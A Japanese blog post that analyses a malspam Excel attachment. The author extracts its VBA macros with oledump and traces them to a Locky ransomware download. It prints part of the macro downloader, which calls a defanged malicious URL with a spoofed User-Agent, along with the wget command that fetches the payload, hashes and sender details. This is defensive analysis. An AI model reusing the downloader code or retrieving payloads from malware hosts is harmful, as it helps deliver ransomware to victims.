ども。こんばんは。

今日くらいから、docやxlsなど、後ろに”m”が付かないファイルが増えたようです。

おいらん家に届くのは、docmかzip(中身JS)のパターンが多かったのですが、doc/xlsが増えた気がしますね。

例えば今日来た

From:erna[.]collier at gmail[.]com
Subject:Receipt 01935-4862

#本文なし

添付:Receipt 94213-571.xls (md5:806f976990044461e562e29b36b25346)

差出人は@gmailで件名が「Receipt xxxxxxx」※(xxは数字っぽい)な感じでdoc(docmじゃないよ)も来ていた。同じく本文なし。

xls自体は↓これの模様。

https://malwr.com/analysis/MGQ5Mzk3NTA1NDNkNDIzMDk3YmFjOTYwMjFkZDQwMjE/

ヘッダ見てると、85[.]185[.]254[.]34(イラン)から来てるっぽですね。
セオリー通りセカンダリのMTAに配送されていました。いやらしい。

なんかいつもと違う気がするので、たまにはoledump.pyあたりでマクロ(VBA)を取り出して見てみますか。
※実はおいら現役時代VBA職人でした。主にAccess、Excelの。

そういえばmacOSにはPythonが最初から入っているんでしたっけ。

んじゃまず、oledumpに必要なolefileを入れます。

easy_installで入れても良さそうですが、とりあえずpipを入れて、pip経由でolefileを入れてみます。

# easy_install pip

そしたらpipでolefileを入れます。

# pip install olefile

oldedumpは以下からダウンロード。

https://blog.didierstevens.com/programs/oledump-py/

そしたらまずはストリーム(中身)を見てみる。

$ python2.7 oledump.py Receipt\ 94213-571.xls

A: xl/vbaProject.bin
A1:       556 ‘PROJECT’
A2:       119 ‘PROJECTwm’
A3: M   10264 ‘VBA/Module1’
A4: M    4874 ‘VBA/Module2’
A5: M    6706 ‘VBA/Module3’
A6:      5114 ‘VBA/_VBA_PROJECT’
A7:      2082 ‘VBA/__SRP_0’
A8:       385 ‘VBA/__SRP_1’
A9: 508 ‘VBA/__SRP_2’
A10:       154 ‘VBA/__SRP_3’
A11:       154 ‘VBA/__SRP_4’
A12:       471 ‘VBA/__SRP_5’
A13:       104 ‘VBA/__SRP_6’
A14:       204 ‘VBA/__SRP_7’
A15:       124 ‘VBA/__SRP_8’
A16:       296 ‘VBA/__SRP_9’
A17:       612 ‘VBA/dir’
A18: m     976 ‘VBA/\xd0\x9b\xd0\xb8\xd1\x81\xd1\x821’
A19: M    2103 ‘VBA/\xd0\xad\xd1\x82\xd0\xb0\xd0\x9a\xd0\xbd\xd0\xb8\xd0\xb3\xd0\xb0’

“M”がついてる、A3,A4,A5,A19あたりがマクロかと。

-s オプションでストリームを指定して-vもつけてきれいに出力。

以下ストリームA3の例。

$ python2.7 oledump.py -s A3 -v Receipt\ 94213-571.xls > A3

こんな感じになります。ちなみにエディタはVisual Studio Codeです。フリーなのに高機能で便利!

mac-macro-malware

ダウンロードの処理はストリームA4(Module2)でやってるみたいです。

Attribute VB_Name = “Module2”

Public Sub VerCadenaPermiso(permiso As String)

(略)

moyaMANUNA4 = “hxxp://veganvet[.]net/g76ub76”

If Application = “Microsoft Excel” Then
moyaMANUNADAcdaw.Open moyaMANUNAPLdunay(5), moyaMANUNA4, False

moyaMANUNADAcdaw.setRequestHeader moyaMANUNARH, “Mozilla/4.5 (compatible; MSIE 6.5; Windows NT 5.5)”

moyaMANUNADAcdaw.Send

これ、普通にwgetしても403ですね。

$ wget hxxp://veganvet[.]net/g76ub76   [/var/temp/kentai]
–2016-09-30 23:32:54–  hxxp://veganvet[.]net/g76ub76
veganvet[.]net をDNSに問いあわせています… 69.195.124.82
veganvet[.]net|69[.]195[.]124[.]82|:80 に接続しています… 接続しました。
HTTP による接続要求を送信しました、応答を待っています… 403 Forbidden
2016-09-30 23:32:54 エラー 403: Forbidden。

なので、書いてあるUser-Agentを指定してみます。

$ wget hxxp://veganvet[.]net/g76ub76 –user-agent=”Mozilla/4.5 (compatible; MSIE 6.5; Windows NT 5.5)”
–2016-09-30 23:39:57–  hxxp://veganvet[.]net/g76ub76
veganvet[.]net をDNSに問いあわせています… 69[.]195[.]124[.]82
veganvet[.]net|69[.]195[.]124[.]82|:80 に接続しています… 接続しました。
HTTP による接続要求を送信しました、応答を待っています… 200 OK
長さ: 204800 (200K) [text/plain]

`g76ub76′ に保存中

100%[======================================>] 204,800     58.5K/s 時間 3.4s    

2016-09-30 23:40:01 (58.5 KB/s) – `g76ub76′ へ保存完了 [204800/204800]

ハッシュは

md5:1e0ca42235f386c42a7e5f51ca9b47b6
sha256:
07b1a04405d284debd514007e90761f4bb3bf638ae9db73a9a2794f682cb9956

おなじみLockyでした。

https://www.virustotal.com/ja/file/07b1a04405d284debd514007e90761f4bb3bf638ae9db73a9a2794f682cb9956/analysis/

拡張子からマクロを表す”m”を外したことで何か変わったのかな?

今回はexcelからマクロだけを抽出して調査しましたが、ちゃんとExcelで開くと今までと違う何かがあるのかな?

それをやるには色々環境構築が面倒なので今日はここまで!

ではでは。またの機会に。